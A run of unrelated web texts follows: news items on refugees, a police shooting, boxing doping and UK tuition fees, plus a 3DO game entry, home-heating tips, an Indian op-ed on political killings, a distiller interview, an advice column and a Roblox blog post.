Some have questioned the professionalism of police after Bobokulova was allowed to pace up and down outside the metro station with the head for about 20 minutes.
A spokeswoman for the Office of the General Prosecutor said a probe would be launched into the matter.
Crash 'n Burn is a futuristic racing/shooter video game developed by Crystal Dynamics and released for the 3DO in 1993. The game was the launch title for the system and was included as a pack-in game with Panasonic's original 3DO console.[1]
The game is set in the year 2044 AD. Players assume the role of any one of six cyberpunks, each equipped with a unique car and a deadly supply of weapons. Full-motion videos of the racers are accessible in between races, in which each character flaunt their skills and insult their opponents with death threats. The game has rally and tournament modes designed for one player.
Reception [ edit ]
Electronic Gaming Monthly gave the game a 7 out of 10. They described it as "a complex and exciting game once you get into [it]", but felt that it was not a strong enough game to sell a system as expensive as the 3DO.[2] GamePro praised the game as having the best racing game graphics ever seen in a home system, and also complimented the striking cast of characters, the variety of tracks, and the shopping feature. However, they criticized the lack of multiplayer and the relative shallowness of the racing gameplay (in particular that cars cannot get into crashes), and concluded it to be "a good, not a great, ride."[3]
ATHENS — A rash of refugees from Africa, southern Asia and the Middle East has been crossing the Aegean Sea and besieging a cluster of craggy Greek islands.
Local officials have called for the central government to declare a state of emergency on the tiny island of Leros, after the Greek coast guard picked up more than 200 refugees, half of them minors, over the weekend.
The immigrants, Pakistanis, Ethiopians, Iraqis and Somalis, said they had reached Greece by boat from Turkey.
Some were sent to reception centers across the country, while others were released after requesting political asylum, the authorities said.
Advertisement Continue reading the main story
“The problem now is who takes care of the minors,” said Chrysoula Sifouniou, deputy prefect of the Dodecanese, a group of islands dotting the Aegean's southeast flank near the Turkish coast. “We don't have the infrastructure to cope with them, not even a single reception center for them. There's no state plan or strategy in place to deal with these cases.”
Andrew Schuster, AIA, is a registered architect in New York State who designs high-performance buildings at Ashley McGraw Architects D.P.C. in Syracuse, NY. He is also the Outreach Director for the American Institute of Architects Central New York (AIACNY) Chapter and believes that great design backed up by the right science can improve lives and promote healthier, happier communities.
By Andrew Schuster, AIA
With winter coming, it's time to get our homes ready. Much of what we can do to protect our home from the snow and save money on our heating bills is simple and easy to find online. However, if you'd like to make bigger changes to enhance the livability of your home in the winter, we've looked at some common options.
1. Replace that fireplace
A great way to refresh your living space is to put in a new heating appliance in that old fireplace. A traditional wood-burning fireplace sucks more heat out of the house through your chimney than it adds from the heat of the fire. A glass door slows air leakage, but if you really want to save money on your heating bills you should look at a woodstove or gas insert. They'll provide a backup heat source while efficiently heating your living spaces, and they make a great centerpiece for an interior redesign.
2. Add south-facing windows
Large south-facing windows will help catch the sun's energy in the winter and warm your living space. By sizing them to work with your house's design, and orienting them south to southwest, your architect can help you gain free heat and brighten your home during the winter months. An insulated curtain will keep that heat in all night, and large roof overhangs or a deciduous tree can make sure that you don't gain unwanted heat in your house during the summer months.
3. Build a sunspace
A sunspace is type of porch, but It's designed to capture heat like a greenhouse. A well-designed sunspace can double as a screen porch in the summer, and will allow you to enjoy being on that porch well into the cold months. By staying warm from the sun during the winter days, a sunspace will let you open your now-inside windows during the winter and you'll feel like summer has come early. It's also a great place to store outdoor potted plants that need extra winter protection (and bring much needed life to winter) while cutting your heating bills by protecting an exterior wall from winter winds.
4. Add a porch
Even if you aren't interested in a sunspace, having a covered entry will keep snow out of your house and moisture out of your door sill. This is especially important on north-facing walls. By protecting your doors you'll increase the life of them, and a well-designed porch will add beauty and value to your home. You'll also be able to enjoy the protection of a porch all summer long with a place to sit outside on rainy days. A good architect will make sure that the design enhances your home and does its job without looking tacked on.
5. Insulate your home
If your home was built before the 1970s, chances are it has little to no insulation. Insulating your home could cut your heating bills in half. Attic insulation is usually straightforward and easy to install, but you should consult a professional before you insulate your walls or you might be risking black mold in our harsh climate. Your architect will match the type of insulation to the type of construction of your house. Insulating your walls is best done from the outside of the wall, so you should definitely do this if you're replacing your siding. Having a good designer on board to help with your siding selection will help you improve the look of your house at the same time that you improve its performance.
6. Open up your interior
Having lots of small rooms will mean that some are cold and some are warm because your heating system doesn't serve them all equally. Also, most homes only have one thermostat, so different rooms will be different temperatures because they share a control point in a different space. An open-plan living space will spread the heat more evenly, and you can better take advantage of the heat added by your south windows or sunspace. If you've wanted to do an interior remodel, an experienced designer can help you create a space that enhances the way you live and works in harmony with the climate you live in.
Always consult an architect or a structural engineer before moving walls or adding openings in your home, because making structural changes could put your safety at risk without a professional review. They will not only bring practical expertise to keep you safe; their years of experience designing spaces for people to enjoy means you'll get a beautiful improvement too that suites your taste and budget.
Violence is violence, whether it's brutal murder of Muslim man or RSS worker
India
oi-Maitreyee
By Maitreyee
New Delhi, August 7: Is violence left, right or centre? A murder is a murder. When blood oozes out of a slain person's veins, religion, caste, gender and nationality take a back seat. And so does political affiliations. Or maybe it doesn't.
Death, unlike life, does not believe in any trapping like an Aadhaar card, a passport or a caste certificate. A brutal death always evokes fear, horror, sympathy and mourning among the livings.
In the current chaotic atmosphere in the country, where violence has almost become regular and to a great extent acceptable, different massacres get different responses from different political parties.
Say if it's the butchery of a Rashtriya Swayamsevak Sangh (RSS) worker in Kerala, the Congress, the Left and other opposition parties maintain a deafening silence over it. The ruling Bharatiya Janata Party (BJP) at the Centre maintains a similar silence or brushes aside cases of mob lynching of Muslim men as an "aberration".
The same Congress and Left join hands and create ruckus in Parliament to condemn mob lynchings of Muslim men witnessed across the country in the name of cow protection in the recent times. The BJP, on its part, wakes up from its "slumber" when a man belonging to its ideological wing, the RSS, is stabbed to death multiple-times allegedly by "goons" belonging to the ruling dispensation in Kerala.
On Sunday, when very "Delhi-centric" Arun Jaitley went on a trip to Kerala to meet the family of slain RSS worker Rajesh Edavakode, who was allegedly hacked to death by Communist Party of India (Marxist) (CPI-M) workers on July 29, one could not stop but wonder why similar "urgency and anger" was not displayed by the finance-cum-defence minister of the country when mob killed Muslim men like Mohammad Akhlaq and Pehlu Khan for allegedly storing beef and smuggling cow.
Condemning Rajesh's death, a visibly angry Jaitley said, "The kinds of wounds inflicted on Rajesh would have embarrassed even terrorists."
The senior-most minister in the Narendra Modi regime blamed the ruling CPI-M-led Left Democratic Front (LDF) regime in Kerala for the killings of RSS workers. However, he did not say a word about the assassinations of CPI-M cadres, neither did he care to visit the house of a murdered left party worker.
If figures are to be believed in the last 17 years, political killings in Kerala took lives of equal numbers of the RSS-BJP workers and the left cadres.
According to an exclusive report by NDTV, as per the state police department record, between 2000 and 2017, 85 CPI-M workers, 65 RSS/BJP workers and 11 persons from the Congress and the Indian Union Muslim League (IUML) have been killed in Kerala.
The police called all these murders result of political rivalry between various parties. The investigations clearly found involvement of either the RSS/BJP or the CPI-M workers in all of these killings.
Over the years, Kannur district had the dubious distinction of being the hub of political killings in the southern state. However, in recent past violence has reached the capital city of Thiruvananthapuram.
NDTV in the same report cited the figures of the National Crime Records Bureau (NCRB) pertaining to political killings in the state. As per the NCRB, since 1991, 45 CPI-M workers and 44 RSS/BJP workers have been killed allegedly by political rivals in Kannur.
Jaitley, and his party, the BJP, which has its government in the Centre and in 18 states of the country, should stay away from taking a partisan view of violence. By having a one-sided view of savagery, senior BJP leaders like Jaitley and Mukhtar Abbas Naqvi (who advised the Opposition to visit other countries to see the plight of minorities) are not only doing a disservice to the country, but are also harming the reputation of the Prime Minister who insists on Sabka Saath, Sabka Vikas (together with all, development for all).
"It is sad that every time the LDF is in power, incidents of violence increase. You have political opponents being killed," Jaitley said, while addressing a press conference in Thiruvananthapuram.
When the Congress and other anti-BJP parties accuse the Modi regime of giving tactical support to the right wing groups, accused of murdering and beating Muslims and Dalits, Jaitley and other leaders of the saffron party warn them of not "politicising" mob lynchings.
Late last month, during a debate on mob lynchings in the Rajya Sabha, Jaitley slammed the Opposition for politicising the issue of mob lynching and said "violence can never be a partisan issue and oppression in the name of cow won't be tolerated."
On Sunday, in Kerala, the union minister conveniently forgetting his own caution issued against the Opposition a few days ago, ended up committing the same blunder of "politicising" the killings in the state.
Kerala, considered to be the bastion of the communists, has been proving a tough electoral battlefield for the BJP with just one MLA in the current state assembly. Kerala is also the state where the RSS has the highest number of its sakhas (branches) in the country.
However, still the BJP is finding it hard to win the votes of the Keralites. Thus, Jaitley's visit to the state when political killings have shaken the ruling party is clearly to win sympathy among the masses by highlighting "murderous streak" of left cadres.
Jaitley said, "Visited the family of our deceased karyakarta Rajesh, who was slaughtered in the most barbaric manner. This kind of violence will neither suppress ideology in Kerala nor it will be able to scare our workers. It will only increase their determination to work harder against those who are perpetuating this operation."
"He belonged to the weaker section of society. Rajesh belonged to a poor family and now his family has no means of a livelihood. He was stabbed mercilessly and there were 70-80 wounds inflicted on his body, even enemies would not be as brutal as those involved in the murder. In the past few months party officers are being attacked, our workers are being attacked and their houses are being set ablaze," Jaitley added.
All Jaitley did in Kerala was spoked like a karyakarta (worker) of the BJP. He should not forget that he is holding two top political berths (defence and finance portfolios). As a union minister he is responsible for the safety of all countrymen, not just that of people belonging to his party or affiliated parties.
Those who still believe that only one kind of killings should be condemned and others ignored, read these lines from the evocative poem--It is murder--by contemporary poet, Sylvia Chidi.
When you take away a life/With the aid of a knife/It is murder/While you extinguish the living with a gun/Without being able to recreate what was born/It is murder/If you feed someone dead tablets/Later have second acrimonious regrets/It is murder/You are taking away a life/It is clinging on to survive/Need I say any more further/It is murder.
OneIndia News
Prior to Gorka's public resignation, the Federalist got a huge scoop — controversial White House aide Sebastian Gorka's resignation letter. Soon after, however, the White House confirmed that Gorka was no longer employed as an assistant to the president, but that he had not resigned.
On August 28, MSNBC host Chris Hayes offered another piece of the puzzle — an email, reportedly from White House security, that said Gorka should not be allowed on the premises. The email was sent an hour before Gorka's resignation went public.
“Over an hour before The Federalist broke the news reporting Gorka resigned, there was already an order from the White House security system not to let Gorka into the building,” Hayes said.
The first email alerting Secret Service to Gorka's banning from the White House was reportedly sent at 6:45 PM on Friday. At 7:14 PM, another email was sent warning them that Gorka likely still has his pass to get in because the order to bar him from the White House came when he was offsite.
“We spoke with two former White House staff members who said an email like this is not remotely normal, saying they had never seen a directive like this for an employee who was voluntarily departing,” Hayes said.
“This does not prove that Gorka was fired,” he concluded. “But he's definitely not allowed back.”
Gorka's resignation came after months of speculation about his alleged ties to anti-Semitic groups in his home country of Hungary.
Jose Mourinho has told ESPN FC that he is not happy with Manchester United's transfer window and is ready to accept signing just one more player before the Aug. 31 deadline.
Mourinho has added £90 million forward Romelu Lukaku from Everton and invested £30.75m in Benfica defender Victor Lindelof since the end of last season, but efforts to sign Inter Milan winger Ivan Perisic and a top-class defensive midfielder have so far proved unsuccessful.
Sources have told ESPN FC that United are within £5m of meeting Inter's valuation of Croatia international Perisic, who has flown to China on the Italian club's preseason tour.
Interest in Chelsea's Nemanja Matic and Tottenham's Eric Dier has failed to result in a breakthrough, however, and Mourinho says he may be forced to settle for just one more new signing this summer.
"We always want more," Mourinho told ESPN FC in an exclusive interview. "We always feel there is room to improve, and I cannot say that I am happy with our transfer window.
Man United manager Jose Mourinho has been left frustrated with a difficult summer window.
"What I can also say is that it is a difficult transfer window, and I don't blame anyone -- it is just a reality of things. The market is going in such a direction that many players are difficult to get, not to say impossible.
"Every club is powerful, and they don't want to sell or their demands are really high, so the market is difficult."
Mourinho said his objective is still to sign two more players, but even if they arrive before the end of August, the United manager says they will have lost crucial preparation time in preseason.
"Everton started really strong in the market without the Lukaku money," Mourinho said. "AC Milan, without selling players, are buying nonstop, so it depends on the moment, the objective, maybe on new owners.
"What I will say is that, a long time ago, we thought about four players to strengthen our squad, but it is really hard to do it. If we do the third and forget the fourth, I would be quite happy with that because I know it is difficult."
Mourinho said he knows Lukaku and Lindelof well -- he managed Lukaku at Chelsea and has watched Lindelof play in the Portuguese championship each weekend.
"I am happy with them, and I know that they will succeed at the club.
"The market ends on Aug. 31, so there is plenty of time, but obviously, the objective for me as manager is always to have the players as soon as possible and try to coach them in the team and develop the team with them, and Lukaku and Lindelof arrived to train in time for day one."
Mark Ogden is a senior football writer for ESPN FC. Follow him @MarkOgden_
The Arizona Republic-12 News Breaking News Team Thu Mar 28, 2013 11:58 AM
Police have identified a Scottsdale resident who was killed in an officer-involved shooting near 87th Street and Osborn Road Wednesday evening.
Preston Phillips Jr., 72, died from multiple gunshot wounds in an incident that apparently began with a dispute between Phillips and a neighbor, police said.
Authorities responded to a report at 5:45 p.m. from a woman who said she was arguing with a neighbor over an illegally parked vehicle in the 8700 block of East Angus Drive.
Scottsdale Police Department Officer Nathan Mullins arrived at the scene and issued the vehicle a parking citation. A white SUV then pulled up alongside Mullins, police said.
Mullins approached the driver's side window of the SUV and the man in the vehicle brandished a gun in a threatening manner, police said. Mullins backed up and fired at the driver several times.
When additional officers arrived at the scene they approached the vehicle and found the driver dead as a result of multiple gunshot wounds and found a handgun on his lap, authorities said.
Mullins was not injured. He has been with the Scottsdale Police Department for seven years and has been placed on leave per the department's policy while the shooting investigation continues, police said.
Medieval & Renaissance Manuscripts
Astrological treatises
Belgium, Bruges, early 15th century, in or before 1403
MS M.785 fol. 6v
See more information »
First Decanus of Taurus in three zones:
1) Sphaera Persica:
Orion, inscribed ORION, hooded, holds sword in right hand and spear in left hand, beside two candlesticks with lighted candles, inscribed NOMINE ORIONIS VOCANTUR ISTA DUO CANDELABRA (Constellation: Orion); man seated in sailing ship inscribed NAUIS EXIMIA, with a pair of legs superimposed on hull (Astrological Sign: Navis Exima); hybrid man, inscribed PERSE SAX. GRECI. CINOKEFALI LATINI CINCIPITES (sic) (Astrological Sign: Cynocephalus).
2) Sphaera Indica:
Woman, inscribed MULIER HABENS PANNOS ADUSTOS, stands with right hand extended toward youth, inscribed FILIUS EIUS, beside coat, inscribed INDUMENTUM FILII, and two pieces of cloth, each inscribed LINTHEUM (Astrological Sign: Woman)
3) Sphaera Graeca:
Perseus, inscribed PERSEUS (Constellation: Perseus); headless standing figure, inscribed CORPUS DECOLLATUM (Astrological Sign: unidentified); hindquarters of ram, inscribed FEMORA ATQUE YLIA ARIETIS (Constellation: Aries); stream of water inscribed SPUMA ERIDANI UEL NILI (Constellation: Eridanus); hindquarters of bull inscribed COXE TAURI (Constellation: Taurus).
DoubleLine Funds CEO Jeffrey Gundlach has an unconventional pick to be the next Chair of the Federal Reserve: Neel Kashkari.
Gundlach told Bethany McLean at Vanity Fair's New Establishment Summit on Tuesday that Kashkari, currently the president of the Federal Reserve Bank of Minneapolis, should be the next Fed chair because “he's the easiest money guy at the Fed right now.”
“I think I'm the only guy on God's green earth that thinks it will be Neel Kashkari,” Gundlach said.
As of Wednesday morning, odds listed on political prediction site PredictIt had Kevin Warsh, a former Fed governor appointed during the Bush administration, as the most likely candidate to succeed Chair Janet Yellen.
Kashkari had shot up to second-most likely to succeed Yellen after being unlisted before Gundlach's comments on Tuesday evening. PredictIt did not have a market for Kashkari before Gundlach's call.
Jerome Powell, currently a Fed governor, is seen as the third-most likely candidate. Yellen is fourth.
Neel Kashkari's odds of becoming the next Fed chair have shot up, according to PredictIt. (Source: PredictIt) More
On Monday, Kashkari wrote an essay which outlined why some of the Fed's policies have been holding back the U.S. economy, particularly when it comes to generating inflation which has persistently undershot the Fed's 2% target. As a member of the Federal Open Market Committee, the Fed committee which votes on monetary policy, Kashkari has voted against the Fed's actions twice.
Gundlach said Kashkari's latest essay effectively argued for more easy money policies — which basically involves keeping interest rates low and maintaining a large balance sheet — which would be an economic positive for President Donald Trump's base.
“I think the President, if he's going to retain his base, needs to deliver something to the disaffected middle class,” Gundlach said. “A stronger dollar is not good for achieving that agenda. A weak dollar is actually positive. And easy money is more a friend of a weak dollar than tight money.”
Neel Kashkari, president of the Minneapolis Federal Reserve and future Fed Chair, according to bond investor Jeff Gundlach. More
Following Trump's election, bond yields moved higher, the dollar rallied, and the stock market rallied in anticipation of faster economic growth and more restrictive trade policies coming from the Trump administration's economic plans. Through most of 2017, the dollar has declined relative to other major currencies and hit levels not seen in almost three years back in September, however if the Fed continues on its plans to raise interest rates in the coming years the dollar would be expected to re-strengthen.
Kaskhari, who is not a traditionally trained economist and previously worked at Goldman Sachs (GS) as well as oversaw the TARP program under President Obama, made firming regulations on big financial institutions a cornerstone of his agenda after taking over the reigns at the Minneapolis Fed in early 2016.
Specifically, as Kashkari told Yahoo Finance last year, “A lot of work has been done since 2008, but the biggest banks are still too big to fail. And in my view, we need to do something about that.”
DoubleLine Capital CEO and chief investment officer Jeff Gundlach. More
Cabin Fever's Rob Robillard
Of all the possible paths to fame and fortune, setting up a whiskey still in the back yard is one of the longer shots. But that's just how Rob Robillard hit the big time.
Interview by Rick Broussard
In 2001, Robillard decided to get out of the electronics business and make a maple whiskey. He knew his dad was handy, so he asked him to build a still in his Chester back yard. They named the still “Buck,” rallied some family and friends to help with the process and released Cabin Fever Maple Whisky (no “e”) in 2007. Buck has long since been retired, though Rob keeps it around. (He's posing with it in the above photo.) Now the distilling is done by one of the largest companies in the country and his product is distributed nationally.
Distilling small-batch spirits is pretty popular now, but you got in a while ago. What inspired you? I have to give the poet Robert Frost some credit. I bought into that “taking the road less traveled” stuff. It's caused me a lot of grief, and sometimes I felt like hitting that Frosty guy on the head, but so many people I look up to kept mentioning it. In 2001, the path of the least resistance was beer and wine. I said, “Screw it. I'm making whisky.” [We've opted for Robillard's spelling of whiskey throughout the interview.]
Describe “Buck” to our readers. It's just a couple of lobster pots welded together with a copper pipe stuffed with stainless-steel wool. I still fire it up once in a while. It works like a charm.
There must have been some bad batches early on. How did you know when you had a winner ? Well, practice does make perfect. I originally started distilling for my friends and family, not to sell in stores. I knew I had a winner when strangers were coming to my house looking for my maple whisky. My wife said either sell it in stores or put the still in the dumpster.
What's something most people don't know about making whisky? Whisky comes out of the still clear. Sitting in the barrel is what gives it its color.
New Hampshire Magazine has to ask this, why did you choose to use Vermont maple syrup? That's a good question, even my mother gave me a hard time with that one. She's like, “Why don't you just get it from the guy down the street?” Vermont is the biggest producer in the country and they use a co-op, so it's a blend of everyone's, that makes it more constant.
You get invited to talk about your success a lot. What's another good question that you get asked?
I was the keynote speaker at the Beer, Bourbon & BBQ event in NYC a couple of months ago. A woman asked, “Did you ever envision it getting this big?” I told her, I was so naive in the beginning I never realized I would be competing against billion-dollar companies. Not to mention, the odds are a bit long, Each year, 300 new brands are registered with the Feds. After five years, less than 10 are still registered. I just said to myself that I'm going forward with this until someone can give me a good enough reason not to.
And no one did? Going without a paycheck for six years, living off my wife's salary wasn't all fun and games. Then she would come home from working all day and do Cabin Fever paperwork till 11. I would have to fight with the kids because they wanted her for homework. I was like, “Figure it out yourself; she's doing my stuff.”
You've sold the brand. Do you continue to represent it? Yeah, I partnered with Diageo, the world's largest liquor company. We were in 13 states and it was getting to be so much. Even with my brother and my sisters-in-law, Julie and Sue Wright, we were swamped. Today, we still go to events but we pace ourselves a lot more.
What's your next adventure? Everyone and his brother is doing flavored whisky now, so that's out. I've been playing with brandies and discovering innovative ways to age spirits. I plan on releasing another brand in the near future. You'll have to stay tuned.
The FDIC closed four more banks on Friday, and the following graph shows bank failures by week for 2009.
Click on graph for larger image in new window.
So far there have been 57 FDIC bank failures in 2009.
It appears there will be close to 100 bank failures this year.
Note: Week 1 ends Jan 9th.
This is nothing compared to the S&L crisis. There were 28 weeks during the S&L crisis when regulators closed 10 or more banks, and the peak was April 20, 1989 with 60 bank closures (there were 7 separate weeks with more than 30 closures in the late '80s and early '90s).
The second graph covers the entire FDIC period (annually since 1934).
Back in the '80s, there was some minor multiple counting ... as an example, when First City of Texas failed on Oct 30, 1992 there were 18 different banks closed by the FDIC. This multiple counting was minor, and there were far more bank failures in the late '80s and early '90s than this year.
The third graph includes the 1920s and shows that failures during the S&L crisis were far less than during the '20s and early '30s (before the FDIC was enacted).
Note how small the S&L crisis appears on this graph with the change in they-axis! The number of bank failures soared to 4000 (estimated) in 1933.
During the Roaring '20s, 500 bank failures per year was common - even with a booming economy - with depositors typically losing 30% to 40% of their bank deposits in the failed institutions. No wonder even the rumor of a problem caused a run on the bank!
Of course the number of banks isn't the only measure. Many banks today have more branches, and far more assets and deposits.
The FDIC era source data is here - including by assets (in most cases) - under Failures and Assistance Transactions
The pre-FDIC data is here.
For those of you who didn't already know, you may be crushed, but unsurprised, to find out that It's Always Sunny in Philadelpia — save for a few exterior shots — is actually filmed in Los Angeles. The only surprise to me, actually, is that it's not filmed in Toronto or Vancouver. As you can see below, from the Google Maps shot, the location is the corner of Mateo street and Palmetto streets in L.A.
Anyway, it turns out the the location of the show's bar, Paddy's Pub, is a popular location in other television shows and films. In fact, someone on Reddit connected an exterior shot on Parks and Recreation to Paddy's Pub.
It's not just Parks and Rec, however. “Paddy's Pub” can also be seen in the background of one of the Fast and Furious movies (please don't ask me which one). (via)
As well as Sons of Anarchy (via).
Also, unsurprisingly, The League (via).
Repo Man also filmed a scene there.
Even Bear Grylls filmed a deodorant commercial there.
Though I have no photographic proof, apparently The Wire, Southland, and Mad Men have also filmed in front of Paddy's Pub. WORLDS COLLIDING. I hope Frank gets a piece of the revenue.
(via)
By Vadim Pushkin
Andrey Ryabinsky, who promotes Olympic gold medal winner and former WBA heavyweight champion Alexander Povetkin, admits the entire situation with his fighter looks really bad on the outside.
n Saturday, Povetkin knocked out France's Johann Duhaupas in six rounds in Russia. Povetkin was originally scheduled to meet Bermane Stiverne for the interim WBC heavyweight title but Stiverne withdrew after Povetkin's A-sample, from a December 6th drug test, returned positive for Ostarine, a banned substance. The test result came back only hours before the event was planned to start.
Ostarine is a SARM substance, which athletes use during training. It builds up endurance, like anabolic steroids. The World Anti-Doping Agency (WADA) put SARM substances on its prohibited items list in 2008.
For Povetkin, it was the second time that he tested positive for a banned substance in the last seven months.
Back in May, a planned fight with WBC heavyweight champion Deontay Wilder was canceled when Povetkin tested positive for a banned substance a few days before the fight.
Regarding the fight with Stiverne, Povetkin had passed four VADA tests before the fifth test came up positive.
With Povetkin's failing two tests this year, and all of the ongoing controversy with Russian athletes taking performance enhancing drugs, Ryabinsky realizes the situation looks very bad.
At 37-year-old, a two-year suspension for doping could end the Russian fighter's career, admits Ryabinsky. The WBC is investigating Povetkin and plan to make a full ruling on his future in early 2017.
"If the team is guilty, they will be punished. To get a two year ban for ostarin - to a 37-year-old boxer - that's a serious blow. But the situation is dire. The whole problem with the meldonium [which Povetkin tested positive for in May], it was proven that Povetkin was not guilty - but that whole situation cast a shadow on him. And then there's a global story with accusations against Russia [over their athletes doping]," Ryabinsky said.
"I just hope that common sense is used and there is a detailed examination. To take ostarin, while you're under the microscope of the entire world - is the same as stealing something on the Red Square and then raising it up in the air and shouting 'I stole something.' It's complete nonsense."
Image caption The higher rate of fees has been paid by students who started their studies in or after September 2006
Students have had no extra teaching time at England's universities since tuition fees trebled, researchers say.
The Higher Education Policy Institute study of 9,000 students found no change in their experiences since fees rose from £1,000 to £3,000 in 2006.
It comes as universities are about to treble fees again to a £9,000 maximum.
Universities UK said the extra money had gone on improving libraries, IT facilities and other aspects of student life as well as improving teaching.
Timetabled classes
The institute found that in 2012, the seventh year of higher fees, students reported an average of about 14 hours scheduled teaching per week - almost the same as it was in 2007.
But this is as low as seven hours a week in some disciplines.
The report said this was not surprising as there were different approaches to teaching in different subjects.
But the findings suggested those with fewer timetabled classes a week were more likely to be unhappy with the amount of teaching time they received.
The report said nearly 45% of those with fewer than eight contact hours per week were dissatisfied with this, and that dissatisfaction reduced steadily in line with increasing amounts of contact.
Report author Bahram Bekhradnia said universities needed to explain to students why, for example, they considered three hours contact time to be sufficient. But that case had not been made, he said.‬
While students claimed they were studying about 27 hours a week, there were differences in the amount of effort needed for different subjects, he said.
Students going on to campuses this year will feel like they're paying more and will have increased expectations to match Liam Burns, National Union of Students
"In some subjects, for example medicine and dentistry, study is the equivalent of a full time job. In others it resembles part-time employment."
Mr Bekhradnia added: "A medical student is studying for 37 hours a week on average and a media studies student is studying for an average of 20 hours a week. They all get a degree at the end of it, but it does raise important policy questions."‬
The report concludes that there has been no change in the "provision made for students" as a result of fees trebling.
Mr Bekhradnia said there were messages for the coming higher fees environment, when student fee income will begin to replace much of the teaching grant.
"Universities are in a very different position now," he said.
‪"Students are coming in with greater demands and they will find it very difficult to meet these demands because most are not going to get any more money than they have at present. For most it looks very much like a lose, lose situation."‬
'Better teaching'
But universities minister David Willetts said: "For the first time, thanks to our reforms, power will be in the hands of students.
"This will drive universities to offer the highest quality academic experience and make clear what students can expect from their course, including the contact and support they will receive."
A spokesman for Universities UK said universities had used their additional income to improve a number of aspects on offer to students.
"After two decades of underfunded expansion, students now have access to better libraries and IT facilities, better teaching and more teaching staff, in addition to improved student support structures and communal spaces on campus.
"Fees have also resulted in more targeted bursaries and scholarships to support students."
She added that universities offered more information to students about course structure and contact hours to help them understand and compare different universities and courses.
But National Union of Students president Liam Burns said: "Whether we like it or not students going on to campuses this year will feel like they're paying more and will have increased expectations to match, but there is no evidence that shifting the financial burden to students gives them more power.
"Successive governments have forced students to act as consumers of teaching rather than partners in learning and there is no evidence that this has improved universities."
#1008: Sample bridesmaid resignation letter
Dear Captain Awkward,
I have a friend, who is a wonderful person and who I love hanging out with, but she stresses me the hell out. My issue with her is she constantly changes her mind and changes plans, which drives me crazy – which I realize is partly a personal issue, and I'm working on being more flexible, but she goes above and beyond what I think I'll ever be able to deal with. Right now there are two main issues with her I'm grappling with:
1. I'm a planner by nature, and am the type of person who, when I make plans with someone, put them in my calendar and schedules other things around those plans. This friend CONSTANTLY changes plans, which irks me because then I've planned my day /week around our plans that then get changed or cancelled. I know this about her, and have basically told her twice now, “It stresses me out when you change our plans. Please don't.” Each time she apologizes and says she's going to be less flaky, but it never sticks. I'm to the point now where I avoid making plans with her unless it's something I intended to do anyway – i.e., I'll invite her to an event I'm planning to go to solo anyway, or invite her to group things where I know other people are going, so if she bails it's not a big deal. But I feel like it's affected our relationship, as I'm turning down invites from her to go do stuff because it may or may not actually happen, and thus don't see her as often.
2. In a more recent development, this friend got engaged. I was asked to be a bridesmaid. Reluctantly, I said yes, after deciding saying no and probably damaging our relationship wouldn't be an outcome I am okay with. But with wedding planning comes, well, planning, and again she is constantly going back on decisions that I think are set decisions, and it drives me nuts. For instance, when I said I would be a bridesmaid, she said she was buying our dresses. Then she said her dad said she couldn't buy our dresses, and we had to buy our own. Fine, whatever. Then she texted all the bridesmaids that she had decided on an outfit and told us to order it, and to coordinate with each other if we wanted to go a group order (they do discounts on group orders so it would be financially advantageous for us to do so.) But she didn't help coordinate a group order other than suggesting it. Then the next day she said she was still looking at other dress options. Then a few days later she sent us a text saying she made up her mind, order the first outfit she sent, do it in the next week, and if need be she'd pay for the group order and we could pay her back. THAT SAME DAY, like literally three hours later, she said no rush on ordering dresses, she was still looking. This entire exchange and the fact that I can't take her at her word stresses me out to no end, and I know this is just the start – there are still many wedding logistics to work out that I will be involved in, such as the bachelorette, and the rehearsal dinner, and the day of the ceremony itself, and I don't know if I can handle a year of this. Also she's told us she'd pay for other things, like our hair and makeup, but I don't know if I can take her at her word or if she'll change her mind and I'll be responsible for paying for those things too.
So my questions are this: What are some scripts I can use to reiterate, once again, that changing plans stresses me out? And how can I explain to her that I feel like I can't take her at her word with the wedding decisions, and she needs to put a stop to that too if she wants me to be a part of her big day?
Please Help!
Reluctant Bridesmaid
Dear Reluctant Bridesmaid,
You are handling your question #1 perfectly. You have figured out that she is who she is, you have made the inviting easy on yourself, and the result is sometimes you spend less time together, which, okay? There is a deep incompatibility between you, and yet your love for her moves you to cross that chasm the best you can and enjoy the time with her that you have.
Let's talk about question #2: Bridesmaidery
What if you got a beautiful card and wrote this note in it and sent it?
“Dear Friend, I'm so happy for you and so excited to celebrate at your wedding, and so honored that you asked me to stand up with you, but I'm realizing that I can't serve as your bridesmaid. I want you to have exactly the wedding you want, and I'm so sorry that I can't be there for you for the ups and downs of planning it, but I wanted to let you know now so you can make other plans. Congratulations and love to you.”
Will peace-ing out hurt her feelings and damage your friendship? Yes. Probably.
Is she hurting your feelings and damaging your relationship by constantly changing her mind? YES.
Will there be a friendship left if you have to read the words “rush order your dress/no wait, don't” one more fucking time this month?
If she asks you why you quit her wedding, can you tell her the truth? “Well, it's not a secret that we have very different planning styles, and this whole thing over the dress already has me so stressed out that I know this is the right decision for me. I'd love to be at your wedding as a guest and a friend if you'll have me, but I can't be a bridesmaid, I'm sorry.”
Will it be easy? No. She'll try to reassure you that it won't happen again but you 100% know it will happen again with literally every decision. You asked for how you can make it clear that she can't keep changing plans if she wants you to be a part of her big day, but even if you make an agreement like that you'll still end up where you are (stressed out, broke) down the road. She can't make or keep commitments to you! You already have all the evidence you'll ever need for how this will go.
Be nice to yourself. Get out of this wedding party.
And, for everyone reading this, one possible answer to “Will you be in my wedding?” is “Oh, I'm so happy for you, but I can't commit to that.” Or, “Let me think about it – I'm so happy for you and I'd love to be a part of it, but I want to be sure I really can do it before I say yes.” Some people will take that very badly and it might affect the friendship, but the Venn diagram of “people who take ‘No, I'm sorry' as ‘I hate you forever!'” and “people who will make the wedding planning process a death by 1,000 cuts” has some overlap.
As part of last week's fabulous free stuff giveaway, we gave out 37,000 free “Purple Mystery Boxes”. My theory is: people like free stuff and people like mystery boxes. The mystery box then changed colors a bunch of times. Then it got some weird pictures on it of a dog, an umbrella, a cake, and a keyhole. Was it a mystery? Or was it a warning?!
Someone in the forums pointed out that the first letters of all these things spelled “DUCK”, but this person was largely ignored. Thus the Robloxian populace was unprepared for the coming of EPIC DUCK!
EPIC DUCK is just like you and me, only five stories tall. Here he is providing me with good cover in miked's Ultimate Paintball.
EPIC DUCK is too epic to appear in ROBLOX all the time. So inside of the mystery box, we present to you a smaller-sized alternative rubber ducky. Sure, he's not as mind-blowingly cool as EPIC DUCK, but he also won't crush you into a thousand pieces if you try to wear him on your head.
Some people say that EPIC DUCK will return to Roblox one day. But those people are quacks. It will probably never happen.
…
Right?
– Telamon
James Martin/CNET
